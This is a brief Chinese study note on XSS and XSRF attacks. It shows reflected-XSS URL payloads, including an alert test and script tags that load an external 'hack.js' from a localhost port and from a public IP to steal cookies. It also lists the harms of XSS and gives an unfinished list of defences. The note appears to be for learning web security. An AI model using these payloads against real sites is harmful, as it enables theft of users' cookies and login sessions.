[关闭]
@2890594972 2019-05-16T13:58:28.000000Z 字数 418 阅读 688

xss和xsrf攻击

xss


xss

反射型-url参数直接注入

  1. //普通
  2. http://localhost:3005/?from=china
  3. //alert尝试
  4. http://localhost:3005/?from=<script>alert(123)</script>
  5. // 获取cookie
  6. http://localhost:3005/?from=<script src="http://localhost:3006/hack.js"></script>
  7. http://114.215.87.206:3005/?from=<script src="http://114.215.87.206:3006/hack.js"></script>

危害:XSS攻击的危害,Scripting能干啥就能干啥

  1. 获取页面数据
  2. 获取cookies
  3. 劫持前端逻辑
  4. 发送请求
  5. 偷取网站的任意数据
  6. 偷取用户的资料
  7. 偷取用户的密码和登录态
  8. 欺骗用户

预防:
1、转义字符
2、设置cookie为只读
3、

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注